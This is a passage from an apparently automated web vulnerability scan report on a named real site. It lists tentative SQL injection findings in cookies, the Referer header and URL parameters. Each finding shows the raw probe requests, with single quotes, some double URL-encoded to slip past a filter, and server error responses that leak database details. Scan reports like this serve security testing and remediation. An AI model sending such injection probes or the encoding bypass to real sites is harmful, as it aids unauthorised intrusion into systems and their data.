Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.107. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?1%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:23:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?1%2527%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:23:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.108. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.109. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:18:25 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.110. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:20:46 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:20:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.111. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [fpssCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:15:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:15:19 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.112. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/86-google-analytics-intelligence.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:16:22 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:16:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.113. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [7876d45a49f537da76cfb9e129203eee cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The 7876d45a49f537da76cfb9e129203eee cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7876d45a49f537da76cfb9e129203eee cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 7876d45a49f537da76cfb9e129203eee cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:19:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/89-dont-kill-the-messenger.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:19:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:19:31 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:19:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.114. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/89-dont-kill-the-messenger.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/89-dont-kill-the-messenger.html%2527?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=15
